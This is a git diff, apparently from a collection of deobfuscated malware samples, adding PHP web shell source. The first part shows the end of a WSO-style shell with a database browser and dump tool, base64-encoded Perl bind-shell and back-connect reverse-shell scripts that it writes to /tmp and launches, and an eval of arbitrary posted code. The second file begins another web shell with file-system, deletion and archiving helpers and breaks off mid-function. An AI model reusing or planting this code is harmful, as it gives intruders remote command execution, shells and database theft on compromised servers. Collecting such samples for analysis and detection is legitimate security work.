+                                                                                    }
+                                                                                    echo 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "
+";
+                                                                                }
+                                                                            break;
+                                                                            case 'pgsql':
+                                                                                $this->query('SELECT * FROM ' . $table);
+                                                                                while ($item = $this->fetch()) {
+                                                                                    $columns = array();
+                                                                                    foreach ($item as $k => $v) {
+                                                                                        $item[$k] = "'" . addslashes($v) . "'";
+                                                                                        $columns[] = $k;
+                                                                                    }
+                                                                                    echo 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "
+";
+                                                                                }
+                                                                            break;
+                                                                        }
+                                                                        return false;
+                                                                    }
+                                                                };
+                                                                $db = new DbClass($_POST['type']);
+                                                                if (@$_POST['p2'] == 'download') {
+                                                                    ob_start("ob_gzhandler", 4096);
+                                                                    $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
+                                                                    $db->selectdb($_POST['sql_base']);
+                                                                    header("Content-Disposition: attachment; filename=dump.sql");
+                                                                    header("Content-Type: text/plain");
+                                                                    foreach ($_POST['tbl'] as $v) $db->dump($v);
+                                                                    exit;
+                                                                }
+                                                                wsoHeader();
+                                                                echo "
+<h1>Sql browser</h1><div class=content>
+<form name='sf' method='post'><table cellpadding='2' cellspacing='0'><tr>
+<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
+<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
+<td><select name='type'><option value='mysql' ";
+                                                                if (@$_POST['type'] == 'mysql') echo 'selected';
+                                                                echo ">MySql</option><option value='pgsql' ";
+                                                                if (@$_POST['type'] == 'pgsql') echo 'selected';
+                                                                echo ">PostgreSql</option></select></td>
+<td><input type=text name=sql_host value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>
+<td><input type=text name=sql_login value='" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "'></td>
+<td><input type=text name=sql_pass value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
+                                                                $tmp = "<input type=text name=sql_base value=''>";
+                                                                if (isset($_POST['sql_host'])) {
+                                                                    if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
+                                                                        switch ($_POST['charset']) {
+                                                                            case "Windows-1251":
+                                                                                $db->setCharset('cp1251');
+                                                                            break;
+                                                                            case "UTF-8":
+                                                                                $db->setCharset('utf8');
+                                                                            break;
+                                                                            case "KOI8-R":
+                                                                                $db->setCharset('koi8r');
+                                                                            break;
+                                                                            case "KOI8-U":
+                                                                                $db->setCharset('koi8u');
+                                                                            break;
+                                                                            case "cp866":
+                                                                                $db->setCharset('cp866');
+                                                                            break;
+                                                                        }
+                                                                        $db->listDbs();
+                                                                        echo "<select name=sql_base><option value=''></option>";
+                                                                        while ($item = $db->fetch()) {
+                                                                            list($key, $value) = each($item);
+                                                                            echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
+                                                                        }
+                                                                        echo '</select>';
+                                                                    } else echo $tmp;
+                                                                } else echo $tmp;
+                                                                echo "</td>
+				<td><input type=submit value='>>'></td>
+			</tr>
+		</table>
+		<script>
+			function st(t,l) {
+				document.sf.p1.value = 'select';
+				document.sf.p2.value = t;
+				if(l!=null)document.sf.p3.value = l;
+				document.sf.submit();
+			}
+			function is() {
+				for(i=0;i<document.sf.elements['tbl[]'].length;++i)
+					document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
+			}
+		</script>";
+                                                                if (isset($db) && $db->link) {
+                                                                    echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
+                                                                    if (!empty($_POST['sql_base'])) {
+                                                                        $db->selectdb($_POST['sql_base']);
+                                                                        echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
+                                                                        $tbls_res = $db->listTables();
+                                                                        while ($item = $db->fetch($tbls_res)) {
+                                                                            list($key, $value) = each($item);
+                                                                            $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
+                                                                            $value = htmlspecialchars($value);
+                                                                            echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick=\"st('" . $value . "')\">" . $value . "</a> (" . $n['n'] . ")</nobr><br>";
+                                                                        }
+                                                                        echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
+                                                                        if (@$_POST['p1'] == 'select') {
+                                                                            $_POST['p1'] = 'query';
+                                                                            $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2'] . '');
+                                                                            $num = $db->fetch();
+                                                                            $num = $num['n'];
+                                                                            echo "<span>" . $_POST['p2'] . "</span> ($num) ";
+                                                                            for ($i = 0;$i < ($num / 30);$i++) if ($i != (int)$_POST['p3']) echo "<a href='#' onclick='st(\"" . $_POST['p2'] . "\", $i)'>", ($i + 1), "</a> ";
+                                                                            else echo ($i + 1), " ";
+                                                                            if ($_POST['type'] == 'pgsql') $_POST['p3'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
+                                                                            else $_POST['p3'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
+                                                                            echo "<br><br>";
+                                                                        }
+                                                                        if ((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
+                                                                            $db->query(@$_POST['p3']);
+                                                                            if ($db->res !== false) {
+                                                                                $title = false;
+                                                                                echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
+                                                                                $line = 1;
+                                                                                while ($item = $db->fetch()) {
+                                                                                    if (!$title) {
+                                                                                        echo '<tr>';
+                                                                                        foreach ($item as $key => $value) echo '<th>' . $key . '</th>';
+                                                                                        reset($item);
+                                                                                        $title = true;
+                                                                                        echo '</tr><tr>';
+                                                                                        $line = 2;
+                                                                                    }
+                                                                                    echo '<tr class="l' . $line . '">';
+                                                                                    $line = $line == 1 ? 2 : 1;
+                                                                                    foreach ($item as $key => $value) {
+                                                                                        if ($value == null) echo '<td><i>null</i></td>';
+                                                                                        else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
+                                                                                    }
+                                                                                    echo '</tr>';
+                                                                                }
+                                                                                echo '</table>';
+                                                                            } else {
+                                                                                echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
+                                                                            }
+                                                                        }
+                                                                        echo "<br><textarea name='p3' style='width:100%;height:100px'>" . @htmlspecialchars($_POST['p3']) . "</textarea><br/><input type=submit value='Execute'>";
+                                                                        echo "</td></tr>";
+                                                                    }
+                                                                    echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
+                                                                    if (@$_POST['p1'] == 'loadfile') {
+                                                                        $file = $db->loadFile($_POST['p2']);
+                                                                        echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
+                                                                    }
+                                                                }
+                                                                echo '</div>';
+                                                                wsoFooter();
+                                                            }
+                                                            function actionNetwork() {
+                                                                wsoHeader();
+                                                                $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
+                                                                $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
+                                                                echo "<h1>Network tools</h1><div class=content>
+	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
+	<span>Bind port to /bin/sh [perl]</span><br/>
+	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form>
+	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
+	<span>Back-connect  [perl]</span><br/>
+	Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form><br>";
+                                                                if (isset($_POST['p1'])) {
+                                                                    function cf($f, $t) {
+                                                                        $w = @fopen($f, "w") or @function_exists('file_put_contents');
+                                                                        if ($w) {
+                                                                            @fwrite($w, base64_decode($t));
+                                                                            @fclose($w);
+                                                                        }
+                                                                    }
+                                                                    if ($_POST['p1'] == 'bpp') {
+                                                                        cf("/tmp/bp.pl", $bind_port_p);
+                                                                        $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
+                                                                        echo "<pre class=ml1>$out
+" . wsoEx("ps aux | grep bp.pl") . "</pre>";
+                                                                    }
+                                                                    if ($_POST['p1'] == 'bcp') {
+                                                                        cf("/tmp/bc.pl", $back_connect_p);
+                                                                        $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
+                                                                        echo "<pre class=ml1>$out
+" . wsoEx("ps aux | grep bc.pl") . "</pre>";
+                                                                    }
+                                                                }
+                                                                echo '</div>';
+                                                                wsoFooter();
+                                                            }
+                                                            function actionRC() {
+                                                                if (!@$_POST['p1']) {
+                                                                    $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => VERSION, "safemode" => @ini_get('safe_mode'));
+                                                                    echo serialize($a);
+                                                                } else {
+                                                                    eval($_POST['p1']);
+                                                                }
+                                                            }
+                                                            if (empty($_POST['a'])) if (isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action;
+                                                            else $_POST['a'] = 'SecInfo';
+                                                            if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']);
+                                                            exit;
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php b/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php
new file mode 100644
index 0000000..7f62a2d
--- /dev/null
+++ b/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php
@@ -0,0 +1,1066 @@
+<?php
+
+set_magic_quotes_runtime(0);
+
+if(strtolower(substr(PHP_OS,0,3)) == "win") {
+    define('DS', "\\") ;
+    $os = 'win';
+} else {
+    define('DS', "/") ;
+    $os = 'nix';
+}
+
+if(!function_exists("scandir")) {
+	function scandir($dir) {
+		$dh  = opendir($dir);
+		while (false !== ($filename = readdir($dh)))
+    		$files[] = $filename;
+		return $files;
+	}
+}
+
+function scandir_rec($dir, $dirs_only=false, $maxdepth=0, $writable=false, $no_root=false) {
+    $_content = scandir($dir) ;
+    $content = array() ;
+
+    if(!$no_root) {
+        if(is_dir($dir) || !$dirs_only) {
+            if(!$writable || is_writeable($dir)) {
+                $content[] = $dir ;
+            }
+        }
+    }
+
+    if($_content && is_array($_content)) {
+        foreach($_content as $k=>$v) {
+            if(!preg_match("/^\./", $v)) {
+                if(is_dir($dir . DS . $v) || !$dirs_only) {
+                    if(!$writable || is_writeable($dir . DS . $v)) {
+                        $content[] = $dir . DS . $v ;
+                    }
+                }
+            }
+            if(!preg_match("/^\./", $v) && is_dir($dir . DS . $v)) {
+                if($maxdepth > 0) { 
+                    $__content = scandir_rec($dir . DS . $v, $dirs_only, $maxdepth-1, $writable, true) ;
+                    if($__content) {
+                        foreach($__content as $kk=>$vv) {
+                            if(is_dir($dir . DS . $v) || !$dirs_only) {
+                                if(!$writable || is_writeable($dir . DS . $vv)) {
+                                    $content[] = $vv ;
+                                }
+                            }
+                        }
+                    }
+                }
+            }    
+        }
+    }
+    return $content ;
+}
+
+function cust_function_exists($function) {
+  $disabled = explode(', ', ini_get('disable_functions'));
+  return !in_array($function, $disabled) && function_exists($function);
+}
+
+function deleteDir($path) {
+	$path = (substr($path,-1)=='/') ? $path:$path.'/';
+	$dh  = opendir($path);
+	while ( ($item = readdir($dh) ) !== false) {
+		$item = $path.$item;
+		if ( (basename($item) == "..") || (basename($item) == ".") )
+			continue;
+		if (is_dir($item)) {
+			deleteDir($item);
+        } elseif(is_file($item)) {
+            @unlink($item);
+        }
+    }
+	closedir($dh);
+	@rmdir($path);
+}
+
+function smartCopy($source, $dest, $options=array('folderPermission'=>0777,'filePermission'=>0777)) {
+    $result=false;
+
+    if (is_file($source)) {
+        if ($dest[strlen($dest)-1]=='/') {
+            if (!file_exists($dest)) {
+                cmfcDirectory::makeAll($dest,$options['folderPermission'],true);
+            }
+            $__dest=$dest."/".basename($source);
+        } else {
+            $__dest=$dest;
+        }
+        $result=copy($source, $__dest);
+        chmod($__dest,$options['filePermission']);
+       
+     } elseif(is_dir($source)) {
+        if ($dest[strlen($dest)-1]=='/') {
+            if ($source[strlen($source)-1]=='/') {
+                //Copy only contents
+            } else {
+                //Change parent itself and its contents
+                $dest=$dest.basename($source);
+                @mkdir($dest);
+                chmod($dest,$options['filePermission']);
+            }
+        } else {
+            if ($source[strlen($source)-1]=='/') {
+                //Copy parent directory with new name and all its content
+                @mkdir($dest,$options['folderPermission']);
+                chmod($dest,$options['filePermission']);
+            } else {
+                //Copy parent directory with new name and all its content
+                @mkdir($dest,$options['folderPermission']);
+                chmod($dest,$options['filePermission']);
+            }
+        }
+
+        $dirHandle=opendir($source);
+        while($file=readdir($dirHandle))
+        {
+            if($file!="." && $file!="..")
+            {
+                if(!is_dir($source."/".$file)) {
+                    $__dest=$dest."/".$file;
+                } else {
+                    $__dest=$dest."/".$file;
+                }
+                //echo "$source/$file ||| $__dest<br />";
+                $result=smartCopy($source."/".$file, $__dest, $options);
+            }
+        }
+        closedir($dirHandle);
+           
+    } else {
+        $result=false;
+    }
+    return $result;
+ } 
+
+class archive
+{
+	function archive($name)
+	{
+		$this->options = array (
+			'basedir' => ".",
+			'name' => $name,
+			'prepend' => "",
+			'inmemory' => 0,
+			'overwrite' => 0,
+			'recurse' => 1,
+			'storepaths' => 1,
+			'followlinks' => 0,
+			'level' => 3,
+			'method' => 1,
+			'sfx' => "",
+			'type' => "",
+			'comment' => ""
+		);
+		$this->files = array ();
+		$this->exclude = array ();
+		$this->storeonly = array ();
+		$this->error = array ();
+	}
+
+	function set_options($options)
+	{
+		foreach ($options as $key => $value)
+			$this->options[$key] = $value;
+		if (!empty ($this->options['basedir']))
+		{
+			$this->options['basedir'] = str_replace("\\", "/", $this->options['basedir']);
+			$this->options['basedir'] = preg_replace("/\/+/", "/", $this->options['basedir']);
+			$this->options['basedir'] = preg_replace("/\/$/", "", $this->options['basedir']);
+		}
+		if (!empty ($this->options['name']))
+		{
+			$this->options['name'] = str_replace("\\", "/", $this->options['name']);
+			$this->options['name'] = preg_replace("/\/+/", "/", $this->options['name']);
+		}
+		if (!empty ($this->options['prepend']))
+		{
+			$this->options['prepend'] = str_replace("\\", "/", $this->options['prepend']);
+			$this->options['prepend'] = preg_replace("/^(\.*\/+)+/", "", $this->options['prepend']);
+			$this->options['prepend'] = preg_replace("/\/+/", "/", $this->options['prepend']);
+			$this->options['prepend'] = preg_replace("/\/$/", "", $this->options['prepend']) . "/";
+		}
+	}
+
+	function create_archive()
+	{
+		$this->make_list();
+
+		if ($this->options['inmemory'] == 0)
+		{
+			$pwd = getcwd();
+			chdir($this->options['basedir']);
+			if ($this->options['overwrite'] == 0 && file_exists($this->options['name'] . ($this->options['type'] == "gzip" || $this->options['type'] == "bzip" ? ".tmp" : "")))
+			{
+				$this->error[] = "File {$this->options['name']} already exists.";
+				chdir($pwd);
+				return 0;
+			}
+			else if ($this->archive = @fopen($this->options['name'] . ($this->options['type'] == "gzip" || $this->options['type'] == "bzip" ? ".tmp" : ""), "wb+"))
+				chdir($pwd);
+			else
+			{
+				$this->error[] = "Could not open {$this->options['name']} for writing.";
+				chdir($pwd);
+				return 0;
+			}
+		}
+		else
+			$this->archive = "";
+
+		switch ($this->options['type'])
+		{
+		case "zip":
+			if (!$this->create_zip())
+			{
+				$this->error[] = "Could not create zip file.";
+				return 0;
+			}
+			break;
+		case "bzip":
+			if (!$this->create_tar())
+			{
+				$this->error[] = "Could not create tar file.";
+				return 0;
+			}
+			if (!$this->create_bzip())
+			{
+				$this->error[] = "Could not create bzip2 file.";
+				return 0;
+			}
+			break;
+		case "gzip":
+			if (!$this->create_tar())
+			{
+				$this->error[] = "Could not create tar file.";
+				return 0;
+			}
+			if (!$this->create_gzip())
+			{
+				$this->error[] = "Could not create gzip file.";
+				return 0;
+			}
+			break;
+		case "tar":
+			if (!$this->create_tar())
+			{
+				$this->error[] = "Could not create tar file.";
+				return 0;
+			}
+		}
+
+		if ($this->options['inmemory'] == 0)
+		{
+			fclose($this->archive);
+			if ($this->options['type'] == "gzip" || $this->options['type'] == "bzip")
+				unlink($this->options['basedir'] . "/" . $this->options['name'] . ".tmp");
+		}
+	}
+
+	function add_data($data)
+	{
+		if ($this->options['inmemory'] == 0)
+			fwrite($this->archive, $data);
+		else
+			$this->archive .= $data;
+	}
+
+	function make_list()
+	{
+		if (!empty ($this->exclude))
+			foreach ($this->files as $key => $value)
+				foreach ($this->exclude as $current)
+					if ($value['name'] == $current['name'])
+						unset ($this->files[$key]);
+		if (!empty ($this->storeonly))
+			foreach ($this->files as $key => $value)
+				foreach ($this->storeonly as $current)
+					if ($value['name'] == $current['name'])
+						$this->files[$key]['method'] = 0;
+		unset ($this->exclude, $this->storeonly);
+	}
+
+	function add_files($list)
+	{
+		$temp = $this->list_files($list);
+		foreach ($temp as $current)
+			$this->files[] = $current;
+	}
+
+	function exclude_files($list)
+	{
+		$temp = $this->list_files($list);
+		foreach ($temp as $current)
+			$this->exclude[] = $current;
+	}
+
+	function store_files($list)
+	{
+		$temp = $this->list_files($list);
+		foreach ($temp as $current)
+			$this->storeonly[] = $current;
+	}
+
+	function list_files($list)
+	{
+		if (!is_array ($list))
+		{
+			$temp = $list;
+			$list = array ($temp);
+			unset ($temp);
+		}
+
+		$files = array ();
+
+		$pwd = getcwd();
+		chdir($this->options['basedir']);
+
+		foreach ($list as $current)
+		{
+			$current = str_replace("\\", "/", $current);
+			$current = preg_replace("/\/+/", "/", $current);
+			$current = preg_replace("/\/$/", "", $current);
+			if (strstr($current, "*"))
+			{
+				$regex = preg_replace("/([\\\^\$\.\[\]\|\(\)\?\+\{\}\/])/", "\\\\\\1", $current);
+				$regex = str_replace("*", ".*", $regex);
+				$dir = strstr($current, "/") ? substr($current, 0, strrpos($current, "/")) : ".";
+				$temp = $this->parse_dir($dir);
+				foreach ($temp as $current2)
+					if (preg_match("/^{$regex}$/i", $current2['name']))
+						$files[] = $current2;
+				unset ($regex, $dir, $temp, $current);
+			}
+			else if (@is_dir($current))
+			{
+				$temp = $this->parse_dir($current);
+				foreach ($temp as $file)
+					$files[] = $file;
+				unset ($temp, $file);
+			}
+			else if (@file_exists($current))
+				$files[] = array ('name' => $current, 'name2' => $this->options['prepend'] .
+					preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($current, "/")) ?
+					substr($current, strrpos($current, "/") + 1) : $current),
+					'type' => @is_link($current) && $this->options['followlinks'] == 0 ? 2 : 0,
+					'ext' => substr($current, strrpos($current, ".")), 'stat' => stat($current));
+		}
+
+		chdir($pwd);
+
+		unset ($current, $pwd);
+
+		usort($files, array ("archive", "sort_files"));
+
+		return $files;
+	}
+
+	function parse_dir($dirname)
+	{
+		if ($this->options['storepaths'] == 1 && !preg_match("/^(\.+\/*)+$/", $dirname))
+			$files = array (array ('name' => $dirname, 'name2' => $this->options['prepend'] .
+				preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($dirname, "/")) ?
+				substr($dirname, strrpos($dirname, "/") + 1) : $dirname), 'type' => 5, 'stat' => stat($dirname)));
+		else
+			$files = array ();
+		$dir = @opendir($dirname);
+
+		while ($file = @readdir($dir))
+		{
+			$fullname = $dirname . "/" . $file;
+			if ($file == "." || $file == "..")
+				continue;
+			else if (@is_dir($fullname))
+			{
+				if (empty ($this->options['recurse']))
+					continue;
+				$temp = $this->parse_dir($fullname);
+				foreach ($temp as $file2)
+					$files[] = $file2;
+			}
+			else if (@file_exists($fullname))
+				$files[] = array ('name' => $fullname, 'name2' => $this->options['prepend'] .
+					preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($fullname, "/")) ?
+					substr($fullname, strrpos($fullname, "/") + 1) : $fullname),
+					'type' => @is_link($fullname) && $this->options['followlinks'] == 0 ? 2 : 0,
+					'ext' => substr($file, strrpos($file, ".")), 'stat' => stat($fullname));
+		}
+
+		@closedir($dir);
+
+		return $files;
+	}
+
+	function sort_files($a, $b)
+	{
+		if ($a['type'] != $b['type'])
+			if ($a['type'] == 5 || $b['type'] == 2)
+				return -1;
+			else if ($a['type'] == 2 || $b['type'] == 5)
+				return 1;
+		else if ($a['type'] == 5)
+			return strcmp(strtolower($a['name']), strtolower($b['name']));
+		else if ($a['ext'] != $b['ext'])
+			return strcmp($a['ext'], $b['ext']);
+		else if ($a['stat'][7] != $b['stat'][7])
+			return $a['stat'][7] > $b['stat'][7] ? -1 : 1;
+		else
+			return strcmp(strtolower($a['name']), strtolower($b['name']));
+		return 0;
+	}
+
+	function download_file()
+	{
+		if ($this->options['inmemory'] == 0)
+		{
+			$this->error[] = "Can only use download_file() if archive is in memory. Redirect to file otherwise, it is faster.";
+			return;
+		}
+		switch ($this->options['type'])
+		{
+		case "zip":
+			header("Content-Type: application/zip");
+			break;
+		case "bzip":
+			header("Content-Type: application/x-bzip2");
+			break;
+		case "gzip":
+			header("Content-Type: application/x-gzip");
+			break;
+		case "tar":
+			header("Content-Type: application/x-tar");
+		}
+		$header = "Content-Disposition: attachment; filename=\"";
+		$header .= strstr($this->options['name'], "/") ? substr($this->options['name'], strrpos($this->options['name'], "/") + 1) : $this->options['name'];
+		$header .= "\"";
+		header($header);
+		header("Content-Length: " . strlen($this->archive));
+		header("Content-Transfer-Encoding: binary");
+		header("Cache-Control: no-cache, must-revalidate, max-age=60");
+		header("Expires: Sat, 01 Jan 2000 12:00:00 GMT");
+		print($this->archive);
+	}
+}
+
+class tar_file extends archive
+{
+	function tar_file($name)
+	{
+		$this->archive($name);
+		$this->options['type'] = "tar";
+	}
+
+	function create_tar()
+	{
+		$pwd = getcwd();
+		chdir($this->options['basedir']);
+
+		foreach ($this->files as $current)
+		{
+			if ($current['name'] == $this->options['name'])
+				continue;
+			if (strlen($current['name2']) > 99)
+			{
+				$path = substr($current['name2'], 0, strpos($current['name2'], "/", strlen($current['name2']) - 100) + 1);
+				$current['name2'] = substr($current['name2'], strlen($path));
+				if (strlen($path) > 154 || strlen($current['name2']) > 99)
+				{
+					$this->error[] = "Could not add {$path}{$current['name2']} to archive because the filename is too long.";
+					continue;
+				}
+			}
+			$block = pack("a100a8a8a8a12a12a8a1a100a6a2a32a32a8a8a155a12", $current['name2'], sprintf("%07o", 
+				$current['stat'][2]), sprintf("%07o", $current['stat'][4]), sprintf("%07o", $current['stat'][5]), 
+				sprintf("%011o", $current['type'] == 2 ? 0 : $current['stat'][7]), sprintf("%011o", $current['stat'][9]), 
+				"        ", $current['type'], $current['type'] == 2 ? @readlink($current['name']) : "", "ustar ", " ", 
+				"Unknown", "Unknown", "", "", !empty ($path) ? $path : "", "");
+
+			$checksum = 0;
+			for ($i = 0; $i < 512; $i++)
+				$checksum += ord(substr($block, $i, 1));
+			$checksum = pack("a8", sprintf("%07o", $checksum));
+			$block = substr_replace($block, $checksum, 148, 8);
+
+			if ($current['type'] == 2 || $current['stat'][7] == 0)
+				$this->add_data($block);
+			else if ($fp = @fopen($current['name'], "rb"))
+			{
+				$this->add_data($block);
+				while ($temp = fread($fp, 1048576))
+					$this->add_data($temp);
+				if ($current['stat'][7] % 512 > 0)
+				{
+					$temp = "";
+					for ($i = 0; $i < 512 - $current['stat'][7] % 512; $i++)
+						$temp .= "\0";
+					$this->add_data($temp);
+				}
+				fclose($fp);
+			}
+			else
+				$this->error[] = "Could not open file {$current['name']} for reading. It was not added.";
+		}
+
+		$this->add_data(pack("a1024", ""));
+
+		chdir($pwd);
+
+		return 1;
+	}
+
+	function extract_files()
+	{
+		$pwd = getcwd();
+		chdir($this->options['basedir']);
+
+		if ($fp = $this->open_archive())
+		{
+			if ($this->options['inmemory'] == 1)
+				$this->files = array ();
+
+			while ($block = fread($fp, 512))
+			{
+				$temp = unpack("a100name/a8mode/a8uid/a8gid/a12size/a12mtime/a8checksum/a1type/a100symlink/a6magic/a2temp/a32temp/a32temp/a8temp/a8temp/a155prefix/a12temp", $block);
+				$file = array (
+					'name' => $temp['prefix'] . $temp['name'],
+					'stat' => array (
+						2 => $temp['mode'],
+						4 => octdec($temp['uid']),
+						5 => octdec($temp['gid']),
+						7 => octdec($temp['size']),
+						9 => octdec($temp['mtime']),
+					),
+					'checksum' => octdec($temp['checksum']),
+					'type' => $temp['type'],
+					'magic' => $temp['magic'],
+				);
+				if ($file['checksum'] == 0x00000000)
+					break;
+				else if (substr($file['magic'], 0, 5) != "ustar")
+				{
+					$this->error[] = "This script does not support extracting this type of tar file.";
+					break;
+				}
+				$block = substr_replace($block, "        ", 148, 8);
+				$checksum = 0;
+				for ($i = 0; $i < 512; $i++)
+					$checksum += ord(substr($block, $i, 1));
+				if ($file['checksum'] != $checksum)
+					$this->error[] = "Could not extract from {$this->options['name']}, it is corrupt.";
+
+				if ($this->options['inmemory'] == 1)
+				{
+					$file['data'] = fread($fp, $file['stat'][7]);
+					fread($fp, (512 - $file['stat'][7] % 512) == 512 ? 0 : (512 - $file['stat'][7] % 512));
+					unset ($file['checksum'], $file['magic']);
+					$this->files[] = $file;
+				}
+				else if ($file['type'] == 5)
+				{
+					if (!is_dir($file['name']))
+						mkdir($file['name'], $file['stat'][2]);
+				}
+				else if ($this->options['overwrite'] == 0 && file_exists($file['name']))
+				{
+					$this->error[] = "{$file['name']} already exists.";
+					continue;
+				}
+				else if ($file['type'] == 2)
+				{
+					symlink($temp['symlink'], $file['name']);
+					chmod($file['name'], $file['stat'][2]);
+				}
+				else if ($new = @fopen($file['name'], "wb"))
+				{
+					fwrite($new, fread($fp, $file['stat'][7]));
+					fread($fp, (512 - $file['stat'][7] % 512) == 512 ? 0 : (512 - $file['stat'][7] % 512));
+					fclose($new);
+					chmod($file['name'], $file['stat'][2]);
+				}
+				else
+				{
+					$this->error[] = "Could not open {$file['name']} for writing.";
+					continue;
+				}
+				chown($file['name'], $file['stat'][4]);
+				chgrp($file['name'], $file['stat'][5]);
+				touch($file['name'], $file['stat'][9]);
+				unset ($file);
+			}
+		}
+		else
+			$this->error[] = "Could not open file {$this->options['name']}";
+
+		chdir($pwd);
+	}
+
+	function open_archive()
+	{
+		return @fopen($this->options['name'], "rb");
+	}
+}
+
+class gzip_file extends tar_file
+{
+	function gzip_file($name)
+	{
+		$this->tar_file($name);
+		$this->options['type'] = "gzip";
+	}
+
+	function create_gzip()
+	{
